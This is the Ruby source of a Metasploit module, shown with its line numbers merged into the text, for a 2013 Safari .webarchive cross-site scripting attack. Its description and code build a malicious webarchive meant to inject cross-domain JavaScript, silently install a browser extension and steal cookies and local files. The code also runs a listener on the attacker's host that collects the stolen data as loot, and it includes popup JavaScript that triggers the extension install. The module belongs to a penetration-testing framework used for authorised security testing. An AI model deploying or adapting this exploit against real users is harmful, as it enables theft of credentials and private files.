Path: blob/master/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'uri'67class MetasploitModule < Msf::Auxiliary8include Msf::Exploit::FILEFORMAT9include Msf::Exploit::Remote::HttpServer::HTML10include Msf::Exploit::Format::Webarchive11include Msf::Auxiliary::Report1213def initialize(info = {})14super(15update_info(16info,17'Name' => 'Mac OS X Safari .webarchive File Format UXSS',18'Description' => %q{19Generates a .webarchive file for Mac OS X Safari that will attempt to20inject cross-domain Javascript (UXSS), silently install a browser21extension, collect user information, steal the cookie database,22and steal arbitrary local files.2324When opened on the target machine the webarchive file must not have the25quarantine attribute set, as this forces the webarchive to execute in a26sandbox.27},28'License' => MSF_LICENSE,29'Author' => 'joev',30'References' => [31['URL', 'https://www.rapid7.com/blog/post/2013/04/25/abusing-safaris-webarchive-file-format/']32],33'DisclosureDate' => '2013-02-22',34'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],35'PassiveActions' => [ 'WebServer' ],36'DefaultAction' => 'WebServer',37'Notes' => {38'Reliability' => UNKNOWN_RELIABILITY,39'Stability' => UNKNOWN_STABILITY,40'SideEffects' => UNKNOWN_SIDE_EFFECTS41}42)43)44end4546def run47if datastore["URIPATH"].blank?48datastore["URIPATH"] = "/" + Rex::Text.rand_text_alphanumeric(rand(10) + 6)49end5051print_status("Creating '#{datastore['FILENAME']}' file...")52file_create(webarchive_xml)53exploit54end5556def on_request_uri(cli, request)57if request.method =~ /post/i58data_str = request.body.to_s59begin60data = JSON::parse(data_str || '')61file = record_data(data, cli)62send_response_html(cli, '')63print_good "#{data_str.length} chars received and stored to #{file}"64rescue JSON::ParserError => e # json error, dismiss request & keep crit. server up65file = record_data(data_str, cli)66print_error "Invalid JSON stored in #{file}"67send_response_html(cli, '')68end69else70send_response(cli, webarchive_xml, {71'Content-Type' => 'application/x-webarchive',72'Content-Disposition' => "attachment; filename=\"#{datastore['FILENAME']}\""73})74end75end7677# @param [Hash] data the data to store in the log78# @return [String] filename where we are storing the data79def record_data(data, cli)80if data.is_a? Hash81file = File.basename(data.keys.first).gsub(/[^A-Za-z]/, '')82end83store_loot(84file || "data", "text/plain", cli.peerhost, data, "safari_webarchive", "Webarchive Collected Data"85)86end8788# @return [String] formatted http/https URL of the listener89def backend_url90proto = (datastore["SSL"] ? "https" : "http")91myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']92port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"93"#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch"94end9596def message97super + (datastore['INSTALL_EXTENSION'] ? " <a href='javascript:void(0)'>Click here to continue.</a>" + popup_js : '')98end99100def popup_js101wrap_with_script do102%Q|103window.onclick = function() {104window.open('data:text/html,<script>opener.postMessage("EXT", "*");window.location="#{apple_extension_url}";<\\/script>');105};106|107end108end109110end111112113